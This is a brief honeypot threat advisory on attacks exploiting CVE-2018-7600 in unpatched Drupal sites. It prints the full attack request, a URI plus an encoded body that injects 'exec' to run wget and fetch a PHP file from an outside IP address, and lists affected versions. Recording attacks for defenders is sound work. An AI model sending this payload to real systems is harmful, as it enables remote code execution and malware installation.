Date of Detection:
2018.3.29
Attack Pattern:
- URI:
/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
- Request Body:
form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec&
mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php
Target System:
Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code.
Analysis:
This issue is not a zero-day vulnerability and assigned as CVE-2018-7600. However, attackers are scanning and attacking a large portion of worldwide honeypots of CloudCoffer. That means if any system is not updated, it is in a dangerous situation.
Please note that the payload carried from the request bodies are different from requests to requests.